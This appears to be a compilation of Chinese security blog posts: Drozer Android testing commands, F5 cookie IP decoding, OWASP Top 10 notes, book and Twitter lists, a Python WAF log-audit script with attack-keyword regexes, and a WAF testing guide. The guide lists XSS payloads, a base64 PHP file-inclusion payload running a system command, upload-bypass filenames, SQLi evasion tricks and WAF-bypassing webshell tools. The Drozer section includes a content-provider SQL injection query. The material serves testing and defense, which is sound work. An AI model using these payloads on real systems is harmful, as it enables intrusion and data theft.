Drozer工具的简介与安装步骤，可通过Google搜索，本文不再赘述。

信息收集

1
2
3

- run app.package.list -f manu                            ##搜索包含指定字符的包名
- run app.package.info -a com.AAAAA.move   ##列出该包的详细信息
- run app.package.attacksurface com.AAAAA.move   ##列出所有攻击面，也就是四大组件的暴露情况

攻击content provider

1
2
3
4
5
6
7
8

- run app.provider.info -a com.AAAAA.move    ##列出该包所有的content provider
- run app.provider.finduri com.AAAAA.move    ##查找所有content provider的URI
- run app.provider.query content://com.snda.youmi.providers.data/contents/ -- vertical  ##查看这个content的内容
- run app.provider.query content://com.snda.youmi.providers.data/contents --projection "phone_number"  ##查看数据库内容
- run scanner.provider.injection -a com.AAAAA.move  ##扫描content provider是否存在注入漏洞
- run scanner.provider.traversal -a com.AAAAA.move  ##扫描content provider是否存在文件遍历漏洞
- run app.provider.query  content://com.snda.youmi.providers.data/contents/ --projection "'"   ##手工检测注入
- run app.provider.query content://com.snda.youmi.providers.data/contents/ --projection "* from sqlite_master where type='table';--" --vertical ##实际注入

攻击activity

1
2

- run app.activity.info -a com.AAAAA.move   ##列出该包所有的activity
- run app.activity.start --component com.AAAAA.move com.AAAAA.core.ui.InitialActivity   ##启动这个包的这个activity

攻击service

1
2

- run app.service.info -a  com.AAAAA.move  ##列出这个包的所有的service
- run app.service.send com.AAAAA.move com.salesforce.androidsdk.auth.AuthenticatorService --msg 1 5 3  ##向这个包的这个service发消息，有可能导致app crash，形成本地拒绝服务

攻击broadcast receiver

1
2

- run app.broadcast.info -a com.AAAAA.move   ##列出这个包的所有broadcast
- run app.broadcast.send --component com.AAAAA.move com.AAAAA.move3.notification.receiver.NotificationRecevier  ##给这个包的这个broadcast发消息，有可能导致app crash，形成本地拒绝服务

本文既是最近渗透遇到的一点点经验分享。

F5修改cookie机制

F5 LTM做负载均衡时，有多种机制实现会话保持。
其中用到很多的一种是通过修改cookie来实现的。

具体说来，F5在获取到客户端第一次请求时，会使用set cookie头，给客户端埋入一个特定的cookie。

比如：
Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000

后续再接到客户端请求时，F5会查看cookie里面的字段，判断应该交给后续哪台服务器。

作为传统大厂，F5当然不会傻到直接把服务器IP address写入到cookie里面。
F5很巧妙的把server的真实IP address做了两次编码，然后再插入cookie。

所以，只要依据解码流畅，解开487098378.24095.0000的内容，就拿到了server的真实IP address。

解码思路

首先，把第一小节的十进制数取出来，也即，487098378
第二，将其转为十六进制数1d08880a
第三，从后至前，以此取四位数出来，也即，0a；88；08；1d；
第四，依次把他们转为十进制数：10；136；8；29
最后，得到真实内网IP：10.136.8.29

总结

严格意义上说，只有内网的私有IP，对正面突破目标防线的帮助并不明显。
但是，当需要做内网渗透和漫游的时候，这一点信息还是有价值的。
再不济，写report的时候，如果实在没的可写的时候，还可以拿这点作为一个issue作为丰富report的素材。

关于渗透测试，个人理解，由于测试目的不同，测试方法的选择也会略有差异。

以拿权限或拿数据为目的的渗透测试

有时客户需要渗透测试团队拿到服务器最高权限、或者，以拿到服务器上的敏感数据为目标，服务器数量越多越好，敏感数据拿到越多越好。
借由此证明安全防护尚有改善空间。
这时渗透团队需要尽可能快、尽可能多的找到突破口，并提权。
有些无法提权或者进一步利用的中低危漏洞，就不需要考虑太多了。

以全面安全评估为目的的渗透测试

有时客户需要渗透测试团队综合评价待测试目标的安全健壮程度，并给出改善方案。
此类渗透测试更多的是为了后续改善加固做铺垫。
要求漏洞越多越好，越全面越好。
反倒是一些风险承受能力较低的客户，会提出要求，尽可能不要exploit漏洞，点到为止即可。

这份checklist更偏向于第二类渗透测试，内容比较全面，参考价值较高。

主要变化

CSRF减少

• 首次出现于2007 TOP10
• 很多框架包含自动CSRF防御
• 开发人员对此的安全意识在提高

  新加入 ： 攻击检测与防御不足

• 大量应用和API缺少基本的检测、防御、响应能力来对抗自动和手工攻击

  新加入 ： 未保护的API

• 变化主要为适应新技术：云、容器、API
• 变化主要为适应软件开发过程中的自动化：敏捷开发、DevOps
• 变化主要为适应第三方库和框架
• SOAP/XML, REST/JSON, RPC, GWT, etc.

  合并了两类 ： A4和A7，新名称失效的访问控制

• 2007年第一次分拆成了两类
• Insecure Direct Object Reference 关注与数据
• Missing Function Level Access Control 关注与功能

  删除了A10 ：非法重定向

内容解析

A1 Injection

• SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, etc.
• XXE：禁用解释器
• SQLi：绑定变量或使用存储过程，避免动态查询
• 避免方法：使用安全的API，避免使用解释器
• 避免方法：如果参数化API不可用，应仔细过滤特殊符号，OWASP’s Java Encoder是一个可选方案
• 避免方法：白名单，可参考OWASP’s ESAPI

  A2 Broken Authentication and Session Management

• 授权凭据未散列或加密存储
• 授权凭据可猜测或重写
• Session ID暴露在URL
• Session ID易被会话定点攻击 session fixation attack ？？？
• Session ID没有过期时间，或注销后未失效
• Session ID在成功登录后没有轮转 ？？？
• 密码、Session ID和其他凭据明文发送
• 避免方法：单一一套强壮的授权和会化管理控制

  A3 XSS

• 分成客户端XSS（DOM XSS） 和 服务器端XSS
• 避免方法：转义 参考OWASP XSS Prevention Cheat Sheet
• 避免方法：OWASP‘s AntiSamy
• 避免方法：CSP

  A4 Broken Access Control

• 针对数据：应用和API使用了真实名称来生成页面，可猜到
• 针对功能：URL和功能名称容易被猜到
• 自动化工具一般测不出来，需要手工

  A5 Security Misconfiguration

• 利用：默认账户、未使用的页面、未打的补丁、未保护的文件与目录
• 自动化扫描可发现
• 造成原因：软件过期未打补丁
• 造成原因：安装或启用了不必要的功能
• 造成原因：默认账户和密码未修改
• 造成原因：错误信息默认被显示
• 造成原因：应用服务器、框架、库、数据库没有安全配置
• 避免方法：流程控制部署过程
• 避免方法：流程控制软件更新，包括所有库和组件
• 避免方法：自动过程确认配置

  A6 Sensitive Data Exposure

• 利用：中间人攻击，盗取明文数据
• 造成原因：未使用加密算法，或加密算法的密钥生成与密钥管理有缺陷
• 避免方法：为重要数据设置合理正确的加密算法

  A7 Insufficient Attack Protection

• 检测攻击：非法行为（有害字符，有害频率）
• 响应攻击：日志记录detail，自动阻止某IP或某IP段，禁用或监控某些异常账户
• 快速打补丁：真实补丁或虚拟补丁

  A8 CSRF

• 很多框架有CSRF防御措施：Spring、Play、Django、AngularJS
• 所有cookie设置SameSite=strict标志

  A9 Using Components with Known Vulnerabilities

• 造成原因：开发者使用旧版本框架或库，甚至不关心版本
• 造成原因：缺少连续监控组件的版本
• 避免方法：连续监控版本，工具：versions、DependecyCheck、retire.js
• 避免方法：连续监控公开漏洞库

  A10 Underprotected APIs

• 测试方法：与普通功能一样，注入、认证、访问控制、加密、配置等
• 避免方法：确保客户和API间通信是安全的
• 避免方法：确保强加密
• 避免方法：确保解析器抗攻击
• 避免方法：对API做访问控制
• 避免方法：保护不被注入任何形式的数据

第六章 基础设施安全

第七章 网络安全

第八章 入侵感知体系

第九章 漏洞扫描

总结

总得来说，互联网企业和传统行业企业在安全建设的思路上，殊途同归。

不同点

• 扩展性
  互联网企业的业态具有大流量、高实时性、海量用户、海量数据的显著特征。
  由于流量太大，所以“两个海量”的特征与传统企业非常不一样。
  同时，互联网企业的线上业务就是钱，这样就决定了高实时性是必保的点。传统企业的线上业务即便是挂了，在一定时间内也不会直接影响生产力。

为了应对一大一高两个海量，传统安全企业的解决方案存在先天不足：无法无缝横向扩展。
这就导致了互联网企业更多的选择自研防护手段。

互联网企业对安全防护手段的要求是，低维护成本+高扩展性。而传统企业呢，更看重的是易配置+防护全面。

• 自研能力
  这一点非常容易理解。
  互联网企业拥有足够的薪资吸引高端人才，所以才能支撑自研的需求。
  而传统企业除了保护线上业务外，还需要应对合规、内部防泄密等安全外延业务诉求。自身也不具备自研的能力。

相同点

• 分层防御+威胁感知
  无论是线上业务防攻击，还是内部治理防泄密，都必须依赖分层设计的多重防御措施交互实现立体化、深层次的防御能力。
  应对瞬息万变的攻击特征，必须具备第一时间感知威胁发生的能力。
  所以，无论是威胁情报，还是大数据分析，这些技术在不同业态的甲方企业内都会有持续的生命力和价值点。

综上，虽然业态不同，但核心思想还是相通的。

另外，作者赵老师在书中提到，传统企业迫于提高生产力、提高效率的压力，业态向互联网转化的速度会越来越快。
所以，互联网企业在线上业务安全防御方面的经验，领先传统企业十年，此言不虚。

安全的本质始终没有变，就看在不同环境下怎么玩的踏实，怎么玩出精彩。
与君共勉。

为了帮助记忆和理解，我基本上每章都用思维导图的方式整理了笔记。
这些笔记并非对全书的完整总结，亦非斗胆点评，仅作为个人理解和梳理思路的笔记之用。

第三章 甲方安全建设方法论

第四章 业界的模糊地带

第五章 防御架构原则

这是2016我在豆瓣标注过读书的记录，全年读书总量比上一年度多了三本，不包含为了准备CISSP考试看过的辅导书和教材。
读书速度平均比上一年度提高了1天。
今年因为有了Kindle，读了很多电子书，买书其实比以前要少。也因为Kindle，可以利用通勤等碎片时间阅读。

今年读过的书，还是分三类：信息安全、小说、社科历史。

信息安全

信息安全方面，今年看的最多的还是CISSP的教材。AIO、CBK等几本大部头英文原著都啃下来了。
有了这个经历，现在看英文网站资料已经不怎么费劲了。

另外，完整读完了《SQL注入攻击与防御第二版》，系统的总结了SQLi的攻击技巧，感觉收获还是非常大。

小说

今年读了9本小说，重点推荐3本。

巨人的陨落

这本书讲述的是一战前后欧洲各国的历史故事。把几家贵族的兴衰融入了大历史背景中，故事的主人公们和历史真实人物一同经历了历史大事件。
这种写法让我想起来《阿甘正传》。
比如，当你站在英国伯爵的背后，面对工人罢工，不自觉的会升起愤怒。
当你站在独立抗争的女管家的背后，面对贵族的歧视、社会的不公，你又会坚定的支持妇女平权。
这本书给我最大的触动是，站在不同阶级的不同立场看世界，得到的结论与判断会迥然不同。
这种阅读体验非常棒。

白鹿原

电影只翻拍了全书不到三分之一的内容。作者从晚清一直写到了解放后，时间跨度虽大，但读起来并不累。
每个人物的兴衰荣辱，都透出一股子悲天悯人的情怀。历史也不会轻易地放过一个人、一个家。
当你站在历史的分岔路口，每一个看似正确无比的抉择，有可能就是自己在脖子上套上了一条绞索，只等着别人打开你脚下翻板的一瞬。
所以，在政治和历史的旋涡中，我们真的能把握自己的命运么？

陆犯焉识

电影翻拍的内容同样只占全书很小的一部分。和白鹿原一样，只不过这本书的视角放在了旧上海的一个家族身上。
一位留学归来的高级知识分子，最后被历史一刀一刀的割成了“结巴的老几”。这种伤感由不得你不动容。
爱情这种似有实无的东西，反倒成了支撑主人公活下去的理由。

社科历史

同样重点推荐三本

重说中国近代史

这是演讲的文字记录，所以门槛低，不需要太多的前置知识。
从这本书读到的近代史观，和教科书迥然不同，又非完全对立矛盾，非常适合入门。

张作霖传 作者：徐彻

作者是正统历史研究者，其中一个头衔是“奉系军阀史研究会副会长”，所以他手里有很多一手历史素材。
这本书重点看记述的历史事件，资料非常详细。
但历史观就不用太当真了，凡是结论性的文字，建议跳过，毕竟作者是体制内。

激荡三十年

沧桑巨变的三十年，很多事情自己在亲历，却不以为然。透过这本书，试着理解自己的生活，和那段年代。
理解当下有中国特色的市场经济体制，必须要了解计划经济是怎么一步步搞活和开放成了现在的样子。

总的说来，2016年完成了自己的目标，顺利拿到了CISSP证书，顺利换了工作。陪家人和孩子的时间多了很多，我很欣慰。
希望2017年，技术积累更扎实一些。书架上买回来还没看的书更少一点。

祝各位新年快乐！

黑客篇

• @Yang Yu ，这是大名鼎鼎的TK教主。@tombkeeper
• @Soroush Dalili，国外擅长web安全的黑客。@irsdl
• @Claud Xiao，在平底锅工作的华人大牛。不过发的推以英文为主。@claud_xiao
• @Fatih Sevimli，国外某大牛，移动安全和web安全都懂。更新频率尚可。@cyber__sec
• @HD Moore，Metasploit的创始人，更新频率还不错。@hdmoore
• @Ben Hayak，一位国外大牛，更新频率有点低。@BenHayak
• @Pralhad Chaskar‏，以转推为主。可以扩大视野。@c0d3xpl0it
• @4b5f5f4b，腾讯玄武安全实验室的大牛。@4b5f5f4b
• @Mark Johnston，IBM的安全大牛。@cognitivecyber
• @.mario，国外一个大牛，以转推居多。@0x6D6172696F
• @Bincker，360的一位研究员。@Bincker

安全站点篇

• @DarkReading，主要以安全行业新闻为主的站点。@DarkReading
• @Threatpost，主要以安全行业动态为主的站点，也会有技术分析。@Threatpost
• @InfosecurityMag，也是一个安全行业新闻站点。@InfosecurityMag
• @SC Media，scmagazine.com的twitter，更新频率很高。@SCMagazine
• @SecurityWeek，securityweek.com的twitter，会有移动安全和工控安全的料。@securityweek.com
• @The Hacker News，行业新闻居多。@TheHackersNews
• @IT Security Tweets，更新频率很高，值得推荐。@F1r3h4nd
• @Darknet.org.uk ，更新频率有点低，但是内容还不错。@THEdarknet
• @0day Today Database，会发很多0day的动向，居家旅行必备！@inj3ct0r
• @Help Net Security，以行业动向为主。@helpnetsecurity
• @Hacker News，这个就不多说了吧，更新频率巨高。@newsycombinator
• @E Hacking News，一天一推的频率。@EHackerNews
• @Core Security，以行业新闻为主。@CoreSecurity
• @Techworm_in，行业新闻居多，不过我挺喜欢他家的新闻。@Techworm_in
• @NetworkSecurityNews，也是一个新闻站，也是我主要看的账号之一。@NetworkSecNws
• @Security Network™，新闻质量还不错，而且频率高。@SecurityL1st
• @Secure Dude，频率高，质量好。@SecurityMagnate
• @XSS Payloads，专门收集各类xss的payload，web狗必备。@XssPayloads
• @DEF CON，这个应该不用介绍了。@defcon
• @Offensive Security，质量还行，频率尚可。@offsectraining
• @packet storm，频率不错，质量也还行。@packet_storm
• @ShapeSecurity，安全的各个层面他家都有介绍。@ShapeSecurity
• @CSOonline，csoonline.com的官微。@CSOonline

安全公司篇

• @FireEye，火眼的官微，广告不那么多，技术含量不错。@FireEye
• @Palo Alto Networks，平底锅的官微，偶有硬广，技术含量还是很高的。@PaloAltoNtwks
• @sqlmap，这个不多说了。都懂。@sqlmap
• @Black Hat，更新频率有点低。@BlackHatEvents
• @F5 Networks Security，F5专门发安全新闻的号，偶有硬广。@F5Security
• @Fortinet，飞塔的官微，偶有硬广。@Fortinet
• @Imperva，他家的WAF和数据库审计还是不错的。@Imperva
• @Microsoft Secure，微软安全官微，质量不错。@msftsecurity
• @netsparker，他家的扫描器你肯定用过。@netsparker
• @Metasploit Project，这个也不多介绍了吧。@metasploit
• @Checkmarx，做源码审计产品的大公司。@Checkmarx
• @varmournetworks，一家安全初创公司。@varmournetworks
• @ZIMPERIUM，一家做移动安全的初创公司。@ZIMPERIUM
• @ReliaQuest，一家安全服务平台公司。@ReliaQuest

关注的比较多，我现在每天中午会花半小时浏览所有更新内容，把感兴趣的存在pocket里面，晚上临睡前集中读完。不然时间都碎片化了，效率太低。
也希望读者可以在评论里贡献你关注的高质量账户。

0X01 背景

WAF上线之后，处理最多的是误报消除。
产生误报有多种原因，比如web应用源码编写时允许客户端提交过多的cookie；比如单个参数提交的数值太大。
把误报降低到了可接受的范围后，还要关注漏报。WAF不是神，任何WAF都可能被绕过。所以还需要定位漏过的攻击，明确漏报的原因，才能update WAF的策略。
要定位漏报，就必须分析Web应用的访问日志了。一个站点，每天产生的access日志大概接近1GB，显然靠肉眼看是不现实的。这就需要用python帮助自动分析。

0X02 思路

拿我司某Web系统举例：

• apache开启了access日志记录
• 日志规则是每小时生成一个日志文件，以站点名称为文件名，以日期+时间为后缀。例如：special.XXXXXX.com.cn.2016101001

要分析这些散碎的日志文件，我的思路如下：

1. 根据用户命令行输入获取日志文件所在目录；
2. 遍历目录下所有文件，合并到一个文件；
3. 定义web攻击常见payload的字符串：
   • SQLi的：select、union、+–+；
   • Struts的：ognl、java
   • webshell常见的：base64、eval、excute
4. 使用正则逐行匹配，将命中的日志复制到单独的文件。

0X03 实现

代码如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

# -*-coding: utf-8 -*-
import os,re,sys
if len(sys.argv) != 2 :
    print 'Usage : python logaudit.py <path>'
    sys.exit()
logpath = sys.argv[1]
#获取输入参数的文件路径'
merge = re.compile(r'.*(\d[10])')
for root , dirs , files in os.walk(logpath):
    for line in files:
        #遍历日志文件夹，合并所有内容到一个文件
        pipei = merge.match(line)
        if pipei != None:
            tmppath = root + '\\' +line
            logread1 = open(tmppath,'r')
            logread = logread1.read()
            log2txt = open('.\\log.txt','a')
            log2txt.write(logread)
            log2txt.close()
            logread1.close()
        else:
            exit
log = open('.//log.txt','r')
logread = log.readlines()
auditString = re.compile(r'.*[^_][sS][eE][lL][eE][cC][tT][^.].*|.*[uU][nN][iI][Oo][nN].*|.*[bB][aA][sS][eE][^.].*|.*[oO][gG][nN][lL].*|.*[eE][vV][aA][lL][(].*|.*[eE][xX][cC][uU][tT][eE].*')
writelog = open('.//result.txt','a')
for lines in logread:
    auditResult = auditString.match(lines)
    if auditResult != None:
        writelog.write(auditResult.group())
        writelog.write('\n')
    else:
        exit
writelog.close()
log.close()

0X04 后续
WAF上线后的运维工作，除了消除误报解决漏报以外，还有其他更多的分析工作。这方面的内容，我会整理出来，下次单独成文分享。

0X04 Webshell防御

• webshell拦截

文件上传防御难免百密一疏，普通的webshell上传后，攻击者必然要通过与webshell通信，开展后续渗透。WAF必须有能力识别通信内容，并及时阻断。很多webshell的通信内容是经过base64编码的，WAF必须具备解码后准确分析的能力。
测试方法很简单，在服务器上放好测试的webshell，客户端通过WAF后访问webshell，执行重要的操作，如：dir、ls、net user等系统命令；连接操作数据库；上传下载文件等。
这项测试需要收集大量常用webshell，用于覆盖常见webshell的识别。Github上有一个项目收集了各种格式的webshell，妈妈再也不担心我找不到shell啦。
Github webshell collect

• 一句话拦截

如果服务器安装有杀毒软件，常见webshell是可以被查杀的。大马能拦住，小马当然也不能放过。一句话木马可是杀软无力识别的。
防御一句话，其实防御的是菜刀以及各种版本的菜刀与一句话的通信。
这里要重点说两款工具：

- cknife：[项目地址](https://github.com/Chora10/Cknife)，这把刀可以自定义各种通信方式和php执行函数用于绕过waf检测。实际测试下来，的确很多家waf的默认策略对自定义模式拦截无力。
- antSword：[项目地址](https://github.com/antoor/antSword/releases)，修改版的菜刀，也很好用。

0X05 暴力破解及其他杂项

• 暴力破解
  WAF必须具备识别工具自动爆破密码的能力，其实判断的原理不难，分析请求某个文件的某几个参数的频率即可。用BurpSuite测一测就知道。在WAF上需要手工配置防爆破的策略，指明请求的URI、用户需要输入的参数名、访问阈值条件。
  F5 ASM在判断暴力破解行为时，会判断会话有效性，造成这里有个bug，使用burpsuite爆密码时ASM根本拦不住。开了售前ticket查了半天，联系研发才闹明白是判断机制设计所致，自然也就无法修改了。

• 机器访问
  为了防止薅羊毛，WAF必须具备能力，根据用户自定义的URI、参数名、源IP/目的IP、目的URL等条件，拦截超出正常频率的机器访问行为。
  这项测试非常考验设备的自定义程度，而Imperva在自定义策略的灵活性上，遥遥领先其他友商，无愧于Gartner第一象限的位置。自定义程度越高，策略越灵活，防御效果越好，对甲方工程师的技术要求也就越高。很多传统行业的甲方工程师由于不熟悉攻防，对HTTP没研究那么深，自定义策略反而成了工作的负担。在和Imperva工程师交流时多次看到其他同行发来的邮件，询问某某场景下实现某功能，应该如何配置。我觉得如果不懂HTTP，WAF干脆就不要玩了，纯粹是给自己找负担。从白帽子的角度来说，目标网站有WAF不可怕，渗透还是要坚持的，万一对方不懂HTTP呢。

• 指定参数拦截
  在post表单中，安全基线要求代码必须判断用户输入内容是否合理。比如，手机号一项，必须提交13/15/17/18开头的11位纯数字。如果编码时实现该需求，一行正则匹配就搞定。但是你不能保证每个程序猿都是勤奋的。所以，用WAF帮助站点实现该需求是必备功能要求。
  WAF必须具备识别制定URI的指定参数，提交的数据格式。这一项也是将各厂家区分开的重要指标。

• 命令注入
  WAF还必须具备识别命令注入攻击的能力，这一项DVWA是提供了测试功能的。之所以重点拿出来说，是因为Imperva、F5 ASM在这里都存在明显的疏漏。常见系统命令，这两家的WAF都不能在默认策略下准确识别。这一点我很奇怪，明明特征库里是有这一类特征的，可为何检出率如此低？

0X06 设备自身安全

WAF除了要保护目标网站的安全性之外，自身的安全性也不可或缺。别不信，FortiWeb的5.5.3版本就存在CSRF漏洞。国产主流的漏洞扫描产品，除了绿盟也都存在CSRF漏洞。
另外，要使用NMAP等各种工具扫描设备开放的端口，看看有没有什么服务存在已知漏洞。
第三，设备登录入口必须支持连续登录失败X次后拦截登录请求的功能，防止被爆破。
第四，设备web端会使用类似jQuery等库，而第三方库是有各种已知漏洞的，查到CVE后逐个验证下漏洞是否存在。
第四，开个WVS扫一扫页面吧，看看有没有什么明显的漏洞。

0X07 自学习

商业WAF相比自研WAF，最大的优势在于自学习功能。商业WAF拥有多项专利技术，可以根据web应用的访问行为和流量，自动学习用户正常访问行为特征，据此建立防御策略。Imperva在这方面技术领先很多，专利也最多。如果用好了自学习功能，WAF的漏过能够很大程度上的改善。
但是，凡事没有绝对。WAF的自学习功能最大的困扰是误报。Web应用的功能非常复杂，请求方式千奇百怪，机器学习算法再精妙，也不可能百分百还原所有用户正常行为。一旦误判，大量的误报拦截会让管理员叫苦不迭。
实际测试下来，个人感觉自学习功能更多时候是厂商拿来做宣传的噱头和控标的一个指标项，但是实际在生产环境中使用它，最好还是慎之又慎，就连厂商工程师都不建议使用，你敢给领导打保票背这个雷吗？
但是自学习功能并非是聋子的耳朵–摆设。自学习最大的用处其实是分析用户行为的工具。用这个功能连续监控一个月之后，哪个URL被访问次数最多，用户的请求方法与行为是什么，可以通过自动报告一览无余。有了这个报告，后续在做Web应用调优、访客行为分析、判断误报等方面还是很有用的。

0X08 第三方测试工具

除了上述各种手工测试项目，还可以使用第三方开源工具测试WAF的拦截能力。这里推荐两个工具。
第一：碳基体的测试工具：项目地址
这款工具是用perl写的，在t文件夹下已经写好了很多测试脚本，这些脚本可以把攻击payload放在http协议的各个字段提交，用于测试WAF在不同http参数的识别能力。具体用法不多说了，碳基体写的非常清楚。
这里想说两点：

1. X-Forwared-For是很多WAF会漏过的点。
2. 没有哪家WAF可以百分百拦截所有测试脚本。换句话说，测出来漏过的地方，需要WAF上手工配置策略，白帽子们也可以在渗透时自由发挥了。

第二：Ironbee项目：项目地址
Ironbee是一款开源waf，这个项目是测试拦截率的攻击，也是用perl写的。同样的，baseline-detection目录下的脚本，也不是默认策略可以百分百识别的。

0X09 管理与维护

WAF除了要满足低误报低漏报，还必须人性化易管理。下面的几个功能点，是从管理员角度出发测试的内容。

• 设备操作日志：WAF的所有管理员操作必须留存日志备查。
• 管理员权限分割：管理员必须不能删除和操作设备日志，管理与审计权限必须分立。
• 误报后的快速例外：WAF会出现超过50%的误报，出现误报后，设备必须支持快速且简便的例外策略生成。
• 日志包含完整http的request和response，高亮显示违规内容。
• 日志可导出：WAF的日志必须支持以标准syslog格式导出，既可以与SIEM联动，也可以让管理员手工分析。
• 多种形式的报表展现：包括但不限于自定义源地址、目的地址、攻击手法、规则、日期时间等条件的自由组合生成报表。
• 流量可视化展现：统计每个站点流量、统计指定源的流量、统计点击次数，可视化展现。

0X10 写在最后

• 写这篇文章的初衷，绝非为某个品牌站台，或者贬损某个品牌。我在写作的过程中尽量避免带有个人感情色彩，尽量保持对品牌的中立性。任何WAF都是众多开发人员的辛苦结晶，每家都有自己独到的地方，也难免存在疏漏。希望通过甲方安全人员的和厂商研发人员的共同努力，把WAF完善的更好更易用。
• 受限于自己技术能力，测试方法和测试内容难免有遗漏或错误，希望读者反馈指正。
• 全文首发于安全客，地址请戳 很感谢360团队对我的认可。

0X01 测试思路

• 环境搭建
  • 服务器：使用DVWA搭建一套包含各类漏洞的网站，并开启access日志以供分析。DVWA搭建过程不细说。
  • WAF：反向代理部署，将DVWA服务器做反向代理后映射出VS IP。测试时所有payload发送至VS IP，经WAF处理后交给DVWA服务器。
• 测试方法：客户端构造payload提交给VS IP，服务器查看access日志。如被有效识别并过滤，access日志应没有相关内容。

0X02 OWASP TOP10 常规防御

• SQLi
  • get型注入：http://10.44.100.18/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit# 的参数id可以注入，构造payload提交即可。
  • post型注入：DVWA登录过程用burpsuite抓包，即可构造post型注入。
• XSS
  • 反射型XSS和存储型XSS在DVWA中都有，构造payload即可。
• CSRF、command injection、Brute Foce、File upload等等方式，DVWA都有了，不细说。
• 漏掉的是SSRF、反序列化、structs、心脏滴血，这些攻击在当前版本的DVWA中是没有设计的，需要单独考虑。

0X03 绕过技术的防御

除了最常见攻击手法的防御以外，WAF还应该具备识别变形的Payload的能力。
目前国内外商业WAF可以识别99%以上的常规攻击手段，区别主要就体现在对各类编码后的变形Payload的分析能力上。
这里面又区分成了两大类思路。

思路一：

WAF抓取到HTTP包后，做多重解码，将每重解码的结果提取正则，与特征库进行匹配。各家能解码的层数会有区别。F5的ASM可以支持最多5层并且允许用户手工设定层数。其他家虽不可指定解码层数，但都具备相应能力。

思路二：

考虑到正则匹配容易误报漏报，有厂家放弃了这种分析模式，转而做语义分析。长亭科技的SqlChop就是如此，详情可阅读：SQLChop - 一个新型 SQL 注入检测引擎
在测试中，需要手工对payload做编码变形。详细说来：

SQLi变形

• urlencode编码：别小看这种常见的绕过方法，有厂家的WAF还真检测不出来。
• unicode编码
• 关键字大小写替换：这个比较常规了，基本是没有检测不到的。
• 关键字转为十六进制
• 关键字用反引号引起来
• 关键字用/#! #/注释引起来
• 关键字用/##/注释截断：select转为sel/**/ect
• 关键字用%00截断
• 提交的HTTP包中，将x-originating-IP 改为127.0.0.1
• 提交的HTTP包中，将X-remote-addr 改为127.0.0.1
• SQLMAP的各类TAMPER，挨个试一试吧

XSS变形

XSS变形最多，WAF漏报也是最严重的。谁让HTML可利用的标签那么多呢。
这一块的测试，有赖于测试者平时收集各类XSS payload 的量。我仅列出一部分常见的以供参考：

1
2
3
4
5
6
7
8

<embed/src=//goo.gl/nlX0P>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<a onmouseover="javascript:window.onerror=alert;throw 1>
<svg><script>varmyvar="YourInput";</script></svg>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<script>//@cc_on!alert(1)/*@cc_on~alert(2)@*/</script>
<marquee/onstart=confirm(2)>/
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>XSS

文件包含绕过

1

data:text/plain;base64,ZGF0YTp0ZXh0L3BsYWluLDw/cGhwIHN5c3RlbSgnY2F0IC92YXIvd3d3L0ZpbGVJbmNsdWRlLnBocCcpPz4=

文件上传绕过

文件上传绕过主要考虑几个方面：

• 123.php.123
• 123.asp;.gif
• as.php%00.gif
• 文件开头添加GIF89a
• burpsuite抓包修改Content-Type: image/jpeg

###0X03 扫描器防御能力
WAF应具备根据数据包特征识别扫描器的能力，并加以阻止。常见的扫描器，如WVS、SQLMAP、Netsparker、havij、Appscan都应该拿来实际测试WAF的反应。
需要说明的一点是，WAF不仅要拦截扫描器发来的数据包，还应在日志中注明，攻击者使用何种扫描器。这对运维人员分析日志很有帮助。
例如，实际测试中，Imperva对SQLMAP和Netsparker都可以准确识别。而F5的ASM则可以准确识别WVS和SQLMAP。FortiWeb则不具备这个能力。

剩下几个章节，将讨论以下内容：

• Webshell通信拦截测试
• 其余几个小功能点测试
• 设备自身安全测试
• 自学习模式测试
• WAF测试工具
• WAF 管理维护功能测试
  未完待续

原则

• 明确核心信息资产清单
• 流程、组织、技术三方面建设整体方案
  资产清单是管理的抓手，只有明确了要保护什么，才能有的放矢。但梳理信息资产清单，并设计可落地的分级分类措施，这是难点。如何让员工短时间内学会并准确执行分级分类的要求？如何以流程化的方式确保分级分类的落地？这才是管理的核心问题。

  信息分级分类

• 明确核心资产在业务流程中的流转过程
• 明确核心资产在不同系统中的流转过程
  四大的方法论中也有类似的内容。难点仍旧是落地。不能指望业务部门的员工认真分析这两个流转过程，而安全部门又没有能力分析准确。如何有效率的与业务部门结合，花最小的成本高质量的完成梳理工作，这是重点

  融入业务流程

• 按流程划分SDLC阶段
• 每个阶段明确核心资产清单是什么
• 明确在每个阶段，每个核心资产所在位置
• 明确每个阶段、每个资产，在每个位置的安全要求
• 实现安全融入流程，化整为零，完成对业务流程的安全改造，润物细无声
• 补充：数据上载PDM后，本机不留源码副本，并有专人检查
  这是对前文所述的两大流转过程梳理的细化描述。目标是改造出安全的业务流程，达到润物细无声的境界，难度很大

  安全服务举例

• 一键式获取权限，减少对业务影响
• 在申请流程中明确告知事项，不需要用户自己去找
• 直接主管负责审批

  安全流程

• 细化业务流程的操作阶段
• 每个阶段留存独立的日志：授权日志、查询日志、导出日志、加密授权日志、邮件发送日志
  留存日志并定期审计，这是对安全态势的监控，也是对员工的威慑与引导

上述思路其实四大顾问曾经带着我们做过一轮，华为的确是把这套方法论完整落地执行，并且看到了产出物与收益的。这一点的确要佩服华为安全部。
务虚的东西看似美好而遥不可及，但真正落地执行了才知道其中的艰难辛苦。

2016年9月2日，北京。
在经历了5小时30分钟的煎熬后，我在一台电脑上点击了“结束考试”的按钮，走出狭小的考试房。两位年轻的监考老师开始在她们的电脑上操作，一位起身去了打印机旁边，另一位告诉我可以收拾东西了，回去等邮箱里面的邮件通知吧。根据考友们的信息，一般通过考试的才会收到ISC2的邮件通知的，考试失败的会当场给一份成绩说明。果然，监考老师把打印好的成绩单递给了我，一句简单的“恭喜啊”让我悬着的心落地了。随之而来的好像没有预想中的兴奋，只是一种放松。
在努力了8个月之后，我终于通过了CISSP的考试。

记录一些经验，分享给仍然奋战在CISSP备考道路上的各位安全同行们。

0X01 证书简介

CISSP认证的简介，网上一大堆。我只多说以下几点：

